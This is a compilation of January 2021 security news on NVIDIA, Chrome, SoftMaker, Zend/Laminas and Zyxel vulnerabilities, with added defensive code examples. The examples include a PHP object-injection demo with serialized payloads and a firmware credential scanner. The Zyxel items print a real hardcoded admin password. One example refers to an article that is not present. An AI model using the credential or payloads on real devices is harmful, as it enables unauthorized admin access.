The most severe vulnerability, tracked as CVE‑2021‑1051, received a CVSS score of 8.4; it could lead to denial of service or escalation of privileges.

“NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape in which an operation is performed which may lead to denial of service or escalation of privileges,” reads the security advisory.

The company also addressed the CVE‑2021‑1052 flaw that could lead to denial of service, escalation of privileges, and information disclosure. The vulnerability received a CVSS score of 7.8.

“NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape or IOCTL in which user-mode clients can access legacy privileged APIs, which may lead to denial of service, escalation of privileges, and information disclosure,” continues the advisory.

The technology company also resolved the CVE‑2021‑1053 and CVE‑2021‑1054 flaws, which received CVSS scores of 6.6 and 6.5 respectively. Both vulnerabilities may lead to denial of service.

The one flaw specific to the GPU Display Driver for Linux, tracked as CVE‑2021‑1056, may lead to denial of service or information disclosure. It received a CVSS score of 5.3.

The company addressed 10 vulnerabilities affecting the NVIDIA vGPU software, eight of which relate to the vGPU manager. Nine of the 10 vulnerabilities (CVE‑2021‑1057 through CVE‑2021‑1065) received a CVSS score of 7.8.

CVE‑2021‑1066 received a severity score of 7.8.


NVIDIA Ships Patches for High-Severity Security Flaws
9.1.2021 
Vulnerebility  Securityweek

NVIDIA this week announced the release of software updates for its GPU display drivers and vGPU software, with fixes for a total of 16 vulnerabilities.

A total of six security flaws were patched in the NVIDIA GPU display driver, all of them affecting the kernel mode layer. Three of the bugs impact Windows only, one affects only Linux systems, and two impact both Windows and Linux.

The most important of the issues is CVE‑2021‑1051 (CVSS score of 8.4), an issue affecting the GPU driver for Windows and which could lead to denial of service or escalation of privileges.

Next in line is CVE‑2021‑1052 (CVSS score of 7.8), a bug in NVIDIA’s driver for Windows and Linux leading to user-mode clients accessing legacy privileged APIs, which could be exploited for denial of service, escalation of privileges, and information disclosure.

Also leading to denial of service are the next two flaws addressed with this set of patches, namely CVE‑2021‑1053 (affecting Windows and Linux) and CVE‑2021‑1054 (impacting Windows only), NVIDIA explains in an advisory.

The remaining bugs could be exploited for denial of service and information disclosure. Featuring a CVSS score of 5.3, they are tracked as CVE‑2021‑1055 (impacts Windows) and CVE‑2021‑1056 (affects Linux systems).

Nine of the ten vulnerabilities addressed in NVIDIA vGPU software with this set of patches feature a CVSS score of 7.8.

Affecting the guest kernel mode driver and the vGPU plugin of the NVIDIA vGPU software, two of the flaws (CVE‑2021‑1058 and CVE‑2021‑1060) could lead to tampering of data or denial of service.

The remaining issues impact the vGPU plugin of the NVIDIA vGPU manager and could lead to integrity and confidentiality loss, tampering of data, denial of service, or information disclosure. Featuring a CVSS score of 5.5, the tenth vulnerability too affects the vGPU plugin.

NVIDIA released patches to address these vulnerabilities in GeForce, NVIDIA RTX/Quadro, and NVS display drivers for Windows and Linux, as well as Tesla drivers for Windows. Patches for Tesla drivers on Linux will be released in the next couple of weeks.

Patches were also released for vGPU software (guest driver) for Windows and Linux, and for vGPU software (Virtual GPU Manager) for Citrix Hypervisor, VMware vSphere, Red Hat Enterprise Linux KVM, and Nutanix AHV.


Fired Healthcare Exec Stalls Critical PPE Shipment for Months
8.1.2021 
Vulnerebility  Threatpost

A fired Stradis Healthcare employee sought revenge by tampering with shipping data for desperately needed healthcare PPE.

The FBI has announced that Christopher Dobbins pleaded guilty and was sentenced to a year in prison for breaching and temporarily disabling the Stradis Healthcare shipping system using a secret account, after being fired weeks earlier.

Last March, as doctors reported having to ration and reuse personal protective equipment (PPE) to treat COVID-19 patients, Georgia-based Stradis Healthcare, which packages and ships PPE and surgical kits, was eager to step up and help, according to FBI Special Agent Roderick Coffin, who investigated the matter.

“It was both a chance for the company to contribute to the national response and a business opportunity,” Special Agent Coffin, who works out of the FBI’s Atlanta Field Office, said in a statement.

Fired Exec, Secret Account
But several weeks earlier, Georgia-based Stradis had fired Dobbins from his job there as vice president, the FBI reported. Although the company revoked his credentials, Dobbins maintained a secret account, which still allowed him to access the company’s shipping data, the FBI said. In a classic insider threat attack, Dobbins used that retained access to tamper with shipping data, temporarily halting the company’s efforts to distribute the lifesaving medical equipment.

“The company’s operations ground to a halt briefly, and disruptions continued for months,” the FBI reported.

Once the company was able to figure out what was going on, the FBI says they immediately contacted law enforcement, which put the FBI Atlanta Cyber Task Force on the case.

“Given the pandemic, it was especially urgent that we figure out what happened and ensure there was no continuing compromise,” Coffin said. “We also wanted to make a statement that the FBI and the U.S. Attorney’s Office are going to investigate and prosecute these types of crimes.”

Stradis CEO and co-founder Jeff Jacobs said in a statement that the company fully cooperated with law enforcement and is eager to put the matter aside and get back to business.

Stradis’ Open Strategy
“We work every day with these heroes in the medical community and are proud to be a key link in fighting this pandemic,” Stradis President Adam Sokol added. “Partnering with medical professionals has been the fundamental cornerstone of our company and what we strive to do every day – improve the lives of patients. And right now that critical mission is more important than ever, because we know patients’ lives are at stake, and we think about that every minute.”

This incident highlights the risk that insider threats, like disgruntled former employees, can pose to any organization. But it’s IT users with the most privileged access, like vice presidents, who pose the biggest security threat, according to Gurucul COO Craig Cooper.

“This is probably not a surprise to a lot of people, that privileged IT users and administrators are looked at as the biggest threat to organizations,” Cooper said during a recent Threatpost webinar devoted to insider threat mitigation.

Cooper adds that insider threats of all types are on the rise. Those numbers are expected to jump even higher in 2021, Forrester Research predicted. Currently, about 25 percent of data breaches are tied to insider threats and researchers said they expect that number to jump by a staggering 33 percent this year, driven by staff churn and remote work.

The FBI lauded Stradis Healthcare for its early engagement and open collaboration in the investigation related to the matter and said it helped expedite the investigation and get the matter settled quickly and successfully.

“In computer intrusion cases, the crime scenes are the systems in these companies’ offices, and we need their assistance to process that in a way it’s admissible in court,” Coffin said. “The FBI works very hard to proactively establish trust with companies, so when these types of things occur, we can quickly figure out what happened, and they can move forward.”


Nvidia Warns Windows Gamers of High-Severity Graphics Driver Flaws

8.1.2021  Vulnerebility  Threatpost

In all, Nvidia patched flaws tied to 16 CVEs across its graphics drivers and vGPU software, in its first security update of 2021.

Nvidia, which makes gaming-friendly graphics processing units (GPUs), on Thursday fixed a slew of high-severity flaws affecting its graphics driver. The vulnerabilities allow bad actors to cripple systems with denial of service attacks, escalate privileges, tamper with data or sniff out sensitive data.

Affected is Nvidia’s graphics driver (formerly known as the GPU Display Driver) for Windows. The graphics driver is used in devices targeted to enthusiast gamers; it’s the software component that enables the device’s operating system and programs to use its high-level, gaming-optimized graphics hardware.

Nvidia’s Thursday security update addresses flaws tied to 16 CVEs overall. The most severe of these (CVE‑2021‑1051) is an issue in the graphic drivers’ kernel mode layer. This flaw ranks 8.4 out of 10 on the CVSS scale, making it high severity.

Kernel mode is generally reserved for the lowest-level, most trusted functions of the operating system; in this case, the layer (nvlddmkm.sys) handler for the DxgkDdiEscape interface contains a glitch where an operation is performed that could be abused to launch a denial-of-service (DoS) attack or escalate privileges.

Another high-severity flaw (CVE‑2021‑1052) in this same kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape could allow user-mode clients to access legacy privileged application programming interfaces (APIs). According to Nvidia, this “may lead to denial of service, escalation of privileges, and information disclosure.”

Nvidia also stomped out four medium-severity flaws in its graphics driver. Three of these (CVE‑2021‑1053, CVE‑2021‑1054, CVE‑2021‑1055) also stem from the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, while the fourth (CVE‑2021‑1056) exists in a kernel mode layer (nvidia.ko) that does not completely honor operating system file system permissions to provide GPU device-level isolation. That could allow for DoS or information disclosure.

Beyond its graphics drivers, Nvidia warned of flaws tied to nine high-severity CVEs in its virtual GPU (vGPU) software. Nvidia’s vGPU creates graphics-focused virtual desktops and workstations in tandem with the company’s data center Tesla accelerator GPUs.

vGPU Software Flaws
Many of the flaws addressed in Nvidia’s Thursday security advisory stem from Nvidia’s vGPU manager, its tool that enables multiple virtual machines to have simultaneous, direct access to a single physical GPU, while also using Nvidia graphics drivers deployed on non-virtualized operating systems.

One high-severity flaw exists in a plugin within the vGPU manager (CVE‑2021‑1057). This issue could allow guests to allocate some resources for which they are not authorized – which according to Nvidia could lead to data integrity and confidentiality loss, DoS and information disclosure. The vGPU manager also contains a flaw in the vGPU plugin (CVE‑2021‑1059), in which an input index is not validated, which could lead to integer overflow. A race condition (CVE‑2021‑1061) in the vGPU plugin of the vGPU manager could essentially trick it into using a previously validated resource that has since changed, which may lead to DoS or information disclosure.

And, in another Nvidia vGPU plugin issue (CVE‑2021‑1065), input data is not validated, which may lead to tampering of data or DoS.

Various Nvidia GeForce Windows and Linux driver branches are affected; Nvidia has released a full list of affected versions and updated driver versions on its security advisory. The graphics chip manufacturer has likewise released fixes for specific versions of the vGPU software affected by these flaws on its website.

The security advisory is Nvidia’s first in 2021. Last year, the company issued its fair share of patches; including fixes for two high-severity flaws in the Windows version of its GeForce Experience software, and a patch for a critical bug in its high-performance line of DGX servers, both in October; and a high-severity flaw in its GeForce NOW application software for Windows in November.


Google Pays Out Over $100,000 for Vulnerabilities Patched With Chrome 87 Update
8.1.2021 
Vulnerebility  Securityweek

An update released this week by Google for Chrome 87 patches 16 vulnerabilities, including 14 rated high severity. The company has awarded more than $100,000 for these vulnerabilities.

These security flaws can be exploited remotely by unauthenticated attackers to execute arbitrary code and compromise the targeted systems. To trigger the weaknesses, an adversary would need to craft a malicious page and trick the user into visiting it.

Eight of the addressed vulnerabilities are use-after-free bugs impacting various components of the web browser.

The most important of these use-after-free issues affect autofill, drag and drop, and media components, and are tracked as CVE-2021-21106, CVE-2021-21107, and CVE-2021-21108, respectively.

Google paid the reporting security researchers $20,000 for each of these vulnerabilities.

Next in line are CVE-2021-21109 and CVE-2021-21110, use-after-free bugs in payments and safe browsing, respectively. The reporting researchers received $15,000 bug bounties for each of the bugs.

Google also addressed a use-after-free in Blink (CVE-2021-21112), for which it paid a $7,500 bounty reward, and two more in audio (CVE-2021-21114) and safe browsing (CVE-2021-21115), but hasn’t issued monetary rewards for them yet.

Other high-risk flaws the new browser release fixes include insufficient policy enforcement in WebUI (CVE-2021-21111), heap buffer overflow in Skia (CVE-2021-21113), insufficient data validation in networking (CVE-2020-16043), and out of bounds write in V8 (CVE-2020-15995).

Google also addressed high-severity memory corruption vulnerabilities that were identified internally, and which were not issued CVE identifiers, as well as medium-severity bugs.

Chrome 87.0.4280.141 is rolling out for Windows, Linux, and macOS. Users are advised to update to the new release to remain protected.

In an alert issued on Thursday, the Multi-State Information Sharing and Analysis Center (MS-ISAC) warned that these vulnerabilities represent a high risk for large and medium government and business entities and advised them to update as soon as possible.


SoftMaker Office Vulnerabilities Allow Code Execution via Malicious Documents
7.1.2021 
Vulnerebility  Securityweek

Vulnerabilities discovered by Cisco Talos researchers in SoftMaker Office can be exploited for arbitrary code execution by creating malicious documents and tricking victims into opening them.

A German software developer, SoftMaker Software GmbH offers individuals and enterprises a popular office software suite that includes word processing, spreadsheet, presentation, and database software components. The firm’s SoftMaker Office suite provides support for common and internal document file formats.

The recently discovered vulnerabilities impact TextMaker, a component of the SoftMaker Office suite designed to deliver a complete set of word-processing capabilities. According to Talos, each of the flaws can be exploited for arbitrary code execution in the context of the targeted application.

The first of the issues, CVE-2020-13544, is a sign extension bug that affects the document-parsing functionality of TextMaker (SoftMaker Office 2021).

“A specially crafted document can cause the document parser to sign-extend a length used to terminate a loop, which can later result in the loop's index being used to write outside the bounds of a heap buffer during the reading of file data,” Cisco Talos explains.

Tracked as CVE-2020-13545, the second vulnerability is a signed conversion flaw in the same document-parsing functionality of the application.

An attacker can craft a document to cause the document parser to miscalculate a length when allocating a buffer, which will cause the application to write outside the buffer’s bounds, leading to a heap-based memory corruption.

SoftMaker Office 2021's TextMaker was also found to be affected by an integer overflow vulnerability. Tracked as CVE-2020-13546, it results in the application writing outside a buffer with a miscalculated length.

Assessed with a CVSS score of 8.8, all three vulnerabilities are now fixed. The bugs were identified in SoftMaker Office TextMaker 2021, revision 1014, and were reported to the vendor in early October.
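
The three SoftMaker flaws above, like the Photoshop heap-based buffer overflow described earlier on this page, share one shape: a length taken from the file is sign-extended or overflowed before it sizes a heap buffer or bounds a loop, so the parser writes past the end of what it allocated. The C example below is added here and is not Talos’s, SoftMaker’s or Adobe’s code; the record layout (one count byte followed by 16-bit entries) and the two sample records are constructed for the illustration. It shows the buggy length arithmetic in isolation, never using it to drive a write, and beside it a parser that derives every length from an unsigned byte, multiplies with an overflow check, and compares against the bytes actually present before storing anything.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed record layout for this example (not any real file format):
 *   byte 0   : number of 16-bit little-endian entries that follow
 *   bytes 1..: count * 2 bytes of entry data
 */
#define MAX_ENTRIES 255

typedef struct {
    uint16_t entries[MAX_ENTRIES];
    size_t   count;
} record_t;

/* The sign-extension defect, kept only for its arithmetic: the count byte is
 * read through a signed type, so 0x80..0xFF becomes a negative int, and that
 * negative bound turns into an enormous size_t once it meets unsigned
 * arithmetic. A loop bounded by this value runs off the end of any heap
 * buffer sized for it. This function is never used to drive a write. */
size_t vulnerable_entry_bytes(const unsigned char *rec) {
    signed char count = (signed char)rec[0];   /* 0xFF becomes -1 */
    int n = count;                             /* sign-extended: -128..127 */
    return (size_t)n * 2;                      /* -1 -> (size_t)-2 */
}

/* Overflow-checked multiplication for buffer sizing (the integer-overflow
 * case): -1 if count * elem_size would wrap, 0 with the product otherwise. */
int checked_mul(size_t count, size_t elem_size, size_t *out) {
    if (elem_size != 0 && count > SIZE_MAX / elem_size) return -1;
    *out = count * elem_size;
    return 0;
}

/* Wrapper returning only the verdict, for callers that just need to know. */
int mul_wraps(size_t count, size_t elem_size) {
    size_t unused;
    return checked_mul(count, elem_size, &unused);
}

/* Hardened parser: unsigned length, checked multiply, and a comparison
 * against the bytes present before any entry is stored.
 * Returns 0 on success, -1 on malformed input. */
int parse_record_safe(const unsigned char *rec, size_t rec_len, record_t *out) {
    if (rec == NULL || out == NULL || rec_len < 1) return -1;
    uint8_t count = rec[0];                    /* 0..255, never negative */
    size_t need;
    if (checked_mul(count, 2, &need) != 0) return -1;
    if (need > rec_len - 1) return -1;         /* count promises more data than present */
    for (size_t i = 0; i < count; i++)
        out->entries[i] = (uint16_t)(rec[1 + 2 * i] | (rec[2 + 2 * i] << 8));
    out->count = count;
    return 0;
}

/* Constructed samples: a well-formed record with three entries, and one whose
 * count byte has the top bit set but which carries only two bytes of data. */
static const unsigned char SAMPLE_OK[]  = { 3, 0x34, 0x12, 0x78, 0x56, 0xBC, 0x9A };
static const unsigned char SAMPLE_BAD[] = { 0xFF, 0x01, 0x02 };

/* First entry of SAMPLE_OK after a successful parse, or -1. */
int sample_ok_first_entry(void) {
    record_t r;
    if (parse_record_safe(SAMPLE_OK, sizeof SAMPLE_OK, &r) != 0) return -1;
    return (int)r.entries[0];
}

/* Verdict of the hardened parser on SAMPLE_BAD. */
int sample_bad_result(void) {
    record_t r;
    return parse_record_safe(SAMPLE_BAD, sizeof SAMPLE_BAD, &r);
}

int main(void) {
    printf("buggy length for SAMPLE_BAD: %zu bytes\n", vulnerable_entry_bytes(SAMPLE_BAD));
    printf("hardened parse of SAMPLE_BAD: %d\n", sample_bad_result());
    printf("hardened parse of SAMPLE_OK: first entry 0x%04x\n", sample_ok_first_entry());
    return 0;
}
```

The two checks in `parse_record_safe` are the ones a reviewer looks for in any file-format parser: that no length can be negative, and that a length derived from the input is never trusted further than the input it came with.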


RCE ‘Bug’ Found and Disputed in Popular PHP Scripting Framework
6.1.2021 
Vulnerebility  Threatpost

Impacted are PHP-based websites running a vulnerable version of the web-app creation tool Zend Framework and some Laminas Project releases.

Versions of the popular developer tool Zend Framework and its successor Laminas Project can be abused by an attacker to execute remote code on PHP-based websites, if they are running web-based applications that are vulnerable to attack.

However, those that maintain Zend Framework emphasize that the conditions under which a web app can be abused first require the application author to write code that is “inherently insecure.” For that reason, the current maintainers of Zend Framework are contesting whether or not the vulnerability classification is correct.

“We are contesting the vulnerability, and consider our patch a security tightening patch, and not a vulnerability patch,” said Matthew Weier O’Phinney, Zend product owner and principal engineer in an email-based interview with Threatpost.

Impacted Versions of Zend Framework
Impacted is Zend Framework version 3.0.0 and Laminas Project laminas-http before 2.14.2, with an estimated “several million websites” using the framework and possibly impacted. The new maintainers of Zend Framework, Laminas Project, fall within the Linux Foundation’s open-source collaborative ecosystem.

The bug was publicly disclosed Monday by cybersecurity researcher Ling Yizhou, who also published two proof-of-concept attack scenarios. The bug, tracked as CVE-2021-3007, does not have a severity rating listed with MITRE. However, it is rated “high risk” by others within the cybersecurity community.

End of life for Zend Framework was Dec. 31, 2019, after which it was folded into the Laminas Project. According to the maintainers, Zend Framework and Laminas Project are equivalent.

“The project is a collection of individual components, each versioned separately. As such, ‘3.0’ refers to a handful of core components that were tagged with version 3 releases, many of which have evolved significantly from then,” O’Phinney told Threatpost.

The Deserialization Vulnerability and PoC Attack Scenarios
According to Yizhou, the Zend Framework 3.0.0 version has a deserialization vulnerability that can lead to remote code execution “if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php.”

Proof-of-concept (PoC) attack scenarios against Zend Framework and Laminas Project were posted on a GitHub page maintained by security researcher Yizhou. Additional mitigation details are located on the Laminas Project's page, also hosted on GitHub.

An insecure deserialization vulnerability arises when a web application deserializes data that a user controls. In PHP this is usually called object injection: unserialize() instantiates whatever classes the serialized string names, and the magic methods on those classes (such as __destruct or __toString) then run with attacker-chosen property values. The injected data can abuse the application's own logic to cause a denial-of-service (DoS) condition or to execute arbitrary code as the data is deserialized.

Serialization is the process of turning an in-memory object into a data format that can be stored or transmitted; deserialization rebuilds the object from that data later. “People often serialize objects in order to save them to storage, or to send as part of communications,” OWASP describes.

The vulnerability lies in the __destruct method of the Zend\Http\Response\Stream class in Stream.php (Laminas\Http\Response\Stream in the Laminas releases).

Disputed “Vulnerability” Classification
The Linux Foundation’s Laminas Project is disputing the CVE classification. In a statement posted to its GitHub page, it stated:

“On review, we feel this is not a vulnerability specific to the framework, but rather more generally to the language. The un/serialize() functions have a long history of vulnerabilities (please see https://www.google.com/search?q=php+unserialize+RCE for example), and developers should NEVER use it on untrusted input. If this is impossible, they should at the very least pass the second `$options` argument, and provide a list of allowed classes, or use the argument to disallow all unserialization of objects (see https://www.php.net/unserialize for details).

We also received the report you provided against Zend Framework. That project is no longer active, and any security issues are now resolved in the Laminas Project (which will require users migrate to Laminas from ZF). Our findings remain the same for that project, however; this is a PHP language issue, and not specific to our project.”

It further stated that the classification is more generally understood as a “PHP Object Injection” and not specific to any given framework.

“Regardless, we are providing this patch to help further protect our users from these scenarios. The patch provides type checking of the $streamName property before performing a cleanup operation (which results in an unlink() operation, which, previously, could have resulted in an implied call to an object’s __toString() method) in the Laminas\Http\Response\Stream destructor,” the message read.
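As an added illustration of the mechanism the maintainers describe above (example code written for this page, not laminas-http's own code and not the researcher's proof of concept): a minimal re-creation of the object injection chain. A destructor that passes an untyped property to unlink() sits next to the type-checked version the patch describes, and the two unserialize() modes the maintainers recommend against and for are shown side by side. VulnerableStream, HardenedStream, StringGadget and their properties are hypothetical stand-ins, and the gadget only records that its __toString() ran instead of executing anything.

```php
<?php
// Added example, not laminas-http's or the researcher's code. Class and
// property names are hypothetical stand-ins for the real ones.

// A class with a side-effecting __toString(). In a real gadget chain this is
// where code execution would be reached; here it only records that it ran.
class StringGadget
{
    public static bool $fired = false;
    public string $cmd = 'id';

    public function __toString(): string
    {
        self::$fired = true;
        fwrite(STDERR, "[!] __toString() reached, cmd={$this->cmd}\n");
        return '/tmp/nonexistent';
    }
}

// Vulnerable sink: $streamName is handed to unlink() as-is. unlink() takes a
// string, so an object stored there is coerced through its __toString().
class VulnerableStream
{
    public bool $cleanup = true;
    public $streamName;

    public function __destruct()
    {
        if ($this->cleanup) {
            @unlink($this->streamName);
        }
    }
}

// Hardened sink, modelled on the patch described in the article: refuse to
// touch $streamName unless it really is a string.
class HardenedStream
{
    public bool $cleanup = true;
    public $streamName;

    public function __destruct()
    {
        if ($this->cleanup && is_string($this->streamName) && file_exists($this->streamName)) {
            unlink($this->streamName);
        }
    }
}

// Attacker-supplied serialized strings, written by hand the way a PoC would be:
// an outer object whose $streamName property is a nested StringGadget.
$vulnPayload = 'O:16:"VulnerableStream":2:{s:7:"cleanup";b:1;'
             . 's:10:"streamName";O:12:"StringGadget":1:{s:3:"cmd";s:2:"id";}}';
$hardPayload = 'O:14:"HardenedStream":2:{s:7:"cleanup";b:1;'
             . 's:10:"streamName";O:12:"StringGadget":1:{s:3:"cmd";s:2:"id";}}';

// 1) Vulnerable path: unserialize() instantiates both classes; releasing the
//    outer object runs __destruct(), unlink() coerces the gadget, __toString() fires.
StringGadget::$fired = false;
$obj = unserialize($vulnPayload);
unset($obj);
echo "vulnerable sink, default unserialize(): fired=" . var_export(StringGadget::$fired, true) . "\n";

// 2) Same sink, but unserialize() is told to instantiate nothing: both objects
//    come back as __PHP_Incomplete_Class, which has no destructor to run.
StringGadget::$fired = false;
$obj = unserialize($vulnPayload, ['allowed_classes' => false]);
unset($obj);
echo "vulnerable sink, allowed_classes=false: fired=" . var_export(StringGadget::$fired, true) . "\n";

// 3) Hardened sink: the classes are instantiated, but the is_string() check
//    keeps the gadget from ever being coerced, so __toString() never runs.
StringGadget::$fired = false;
$obj = unserialize($hardPayload);
unset($obj);
echo "hardened sink: fired=" . var_export(StringGadget::$fired, true) . "\n";
```

Run it with PHP 7.4 or later. Only the first of the three runs reports fired=true; the second is the maintainers' "disallow all unserialization of objects" advice and the third is the destructor-side fix, and either one alone breaks this chain.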


Expert found a secret backdoor in Zyxel firewall and VPN
2.1.2021 
Vulnerebility  Securityaffairs

Zyxel addressed a critical flaw in its firmware, tracked as CVE-2020-29583, related to the presence of a hardcoded undocumented secret account.
The Taiwanese vendor Zyxel has addressed a critical vulnerability in its firmware related to the presence of a hardcoded, undocumented secret account. The vulnerability, tracked as CVE-2020-29583, received a CVSS score of 7.8; it could be exploited by an attacker to log in with administrative privileges and take over the networking devices.

“Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware.” reads the advisory published by NIST. “This account can be used by someone to login to the ssh server or web interface with admin privileges.”

The CVE-2020-29583 flaw affects the firmware version 4.60 that is used by multiple Zyxel devices.

The vendor removed all vulnerable firmware versions from its cloud and website, except for the USG FLEX 100W/700 (Zyxel cited a base firmware upgrade as the reason).

Impacted devices include Unified Security Gateway (USG), ATP, USG FLEX and VPN firewalls products.

AFFECTED PRODUCT SERIES                        PATCH AVAILABLE IN
Firewalls
  ATP series running firmware ZLD V4.60        ZLD V4.60 Patch1 in Dec. 2020
  USG series running firmware ZLD V4.60        ZLD V4.60 Patch1 in Dec. 2020
  USG FLEX series running firmware ZLD V4.60   ZLD V4.60 Patch1 in Dec. 2020
  VPN series running firmware ZLD V4.60        ZLD V4.60 Patch1 in Dec. 2020
AP controllers
  NXC2500                                      V6.10 Patch1 in April 2021
  NXC5500                                      V6.10 Patch1 in April 2021

The vulnerability was discovered by the security researcher Niels Teusink from EYE.

The expert discovered an undocumented account (“zyfwp”) with the password “PrOw!aN_fXp” stored in plaintext. The credentials could also be used by a malicious third party to log in to the SSH server or web interface with admin privileges.

“When doing some research (rooting) on my Zyxel USG40, I was surprised to find a user account ‘zyfwp’ with a password hash in the latest firmware version (4.60 patch 0). The plaintext password was visible in one of the binaries on the system.” reads the post published by Teusink. “I was even more surprised that this account seemed to work on both the SSH and web interface.”

$ ssh zyfwp@192.168.1.252
Password: Pr*******Xp
Router> show users current
No: 1
Name: zyfwp
Type: admin
(...)
Router>
The expert pointed out that the user is not visible in the device’s interface and its password cannot be changed.
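Two checks a practitioner would want after reading this, as an added example written for this page (not Zyxel's code and not the researcher's tooling): a strings(1)-style pass over a firmware binary that flags a password-looking string sitting next to a known undocumented account name, which is how the researcher says the cleartext password was spotted, and a version test that applies the patch table above (ZLD V4.60 with no patch level is affected, V4.60 Patch1 is fixed). FIRMWARE_BLOB is a constructed stand-in, not a real Zyxel image, and the password heuristic in looks_like_password() is this example's own assumption.

```python
"""Added example, not Zyxel's or the researcher's code. FIRMWARE_BLOB is a
constructed stand-in for a firmware binary; the heuristics are assumptions
of this example, not a Zyxel-specific format."""
import re
import string
from typing import List, Tuple

# Constructed sample binary: noise bytes with a few NUL-terminated strings,
# including the zyfwp account name and the password quoted in the advisory.
FIRMWARE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"\x89\x14\xa0"
    + b"/usr/sbin/sshd\x00"
    + b"\x01\x02\x03"
    + b"zyfwp\x00"
    + b"PrOw!aN_fXp\x00"
    + b"\xff\xfe"
    + b"ftp_update_ap\x00"
    + b"admin\x00"
    + b"1234\x00"
)

KNOWN_BACKDOOR_ACCOUNTS = {"zyfwp"}

# Printable ASCII minus control whitespace; a space inside a string is kept.
_PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def extract_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """Return runs of at least min_len printable bytes, like strings(1)."""
    out: List[str] = []
    cur = bytearray()
    for b in blob:
        if b in _PRINTABLE:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            out.append(cur.decode("ascii"))
        cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out


def looks_like_password(s: str) -> bool:
    """Assumed heuristic: 8-32 chars, mixed case plus a digit or symbol, and
    not a path. Enough to separate a secret from nearby identifiers."""
    if not 8 <= len(s) <= 32 or s.startswith("/"):
        return False
    has_upper = any(c.isupper() for c in s)
    has_lower = any(c.islower() for c in s)
    has_other = any(c.isdigit() or c in string.punctuation for c in s)
    return has_upper and has_lower and has_other


def find_credential_candidates(blob: bytes,
                               accounts=KNOWN_BACKDOOR_ACCOUNTS,
                               window: int = 2) -> List[Tuple[str, str]]:
    """For every known account name in the string table, report the
    password-looking strings among the next `window` strings after it."""
    strs = extract_strings(blob)
    hits: List[Tuple[str, str]] = []
    for i, s in enumerate(strs):
        if s in accounts:
            for cand in strs[i + 1:i + 1 + window]:
                if looks_like_password(cand):
                    hits.append((s, cand))
    return hits


_ZLD_VERSION = re.compile(r"[vV]?(\d+)\.(\d+)(?:\s*[pP]atch\s*(\d+))?")


def is_vulnerable_zld_version(version: str) -> bool:
    """True for ZLD 4.60 with no patch level (or Patch0); False for 4.60
    Patch1 and for every other release. Encodes only the advisory table."""
    m = _ZLD_VERSION.search(version)
    if not m:
        return False
    major, minor, patch = int(m.group(1)), int(m.group(2)), m.group(3)
    return major == 4 and minor == 60 and (patch is None or int(patch) == 0)


if __name__ == "__main__":
    for account, secret in find_credential_candidates(FIRMWARE_BLOB):
        print(f"hardcoded credential candidate: {account} / {secret}")
    for v in ("ZLD V4.60", "ZLD V4.60 Patch1", "ZLD V4.55", "V6.10 Patch1"):
        state = "AFFECTED" if is_vulnerable_zld_version(v) else "not affected"
        print(f"{v}: {state}")
```

Point extract_strings() at a real unpacked firmware image and extend KNOWN_BACKDOOR_ACCOUNTS with any service accounts from your own inventory; the adjacency heuristic is deliberately loose, so treat hits as leads to verify, not findings.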

Teusink reported the flaw to Zyxel on November 29 and the company addressed the flaw with the release of a firmware patch (ZLD V4.60 Patch1) on December 18.

According to the vendor, the hidden account was used to deliver automatic firmware updates to connected access points through FTP.

The expert added that around 10% of 1000 devices in the Netherlands run a vulnerable version of the firmware.

“As the zyfwp user has admin privileges, this is a serious vulnerability. An attacker could completely compromise the confidentiality, integrity and availability of the device. Someone could for example change firewall settings to allow or block certain traffic. They could also intercept traffic or create VPN accounts to gain access to the network behind the device. Combined with a vulnerability like Zerologon this could be devastating to small and medium businesses.” concludes the expert.

“Because of the seriousness of the vulnerability and it being so easy to exploit, we have decided not to release the password for this account at this time. We do expect others to find and release it, which is why we suggest you install the updated firmware as soon as possible.”


Secret Backdoor Account Found in Several Zyxel Firewall, VPN Products
2.1.2021 
Vulnerebility  Thehackernews
Zyxel has released a patch to address a critical vulnerability in its firmware concerning a hardcoded undocumented secret account that could be abused by an attacker to login with administrative privileges and compromise its networking devices.

The flaw, tracked as CVE-2020-29583 (CVSS score 7.8), affects firmware version 4.60, present in a wide range of Zyxel devices, including Unified Security Gateway (USG), USG FLEX, ATP, and VPN firewall products.

EYE researcher Niels Teusink reported the vulnerability to Zyxel on November 29, following which the company released a firmware patch (ZLD V4.60 Patch1) on December 18.

According to the advisory published by Zyxel, the undocumented account ("zyfwp") comes with an unchangeable password ("PrOw!aN_fXp") that's not only stored in plaintext but could also be used by a malicious third-party to login to the SSH server or web interface with admin privileges.

Zyxel said the hardcoded credentials were put in place to deliver automatic firmware updates to connected access points through FTP.

Noting that around 10% of 1000 devices in the Netherlands run the affected firmware version, Teusink said the flaw's relative ease of exploitation makes it a critical vulnerability.

"As the 'zyfwp' user has admin privileges, this is a serious vulnerability," Teusink said in a write-up. "An attacker could completely compromise the confidentiality, integrity and availability of the device."

"Someone could for example change firewall settings to allow or block certain traffic. They could also intercept traffic or create VPN accounts to gain access to the network behind the device. Combined with a vulnerability like Zerologon this could be devastating to small and medium businesses."

The Taiwanese company is also expected to address the issue in its access point (AP) controllers with a V6.10 Patch1 that's set to be released in April 2021.

It's highly recommended that users install the necessary firmware updates to mitigate the risk associated with the flaw.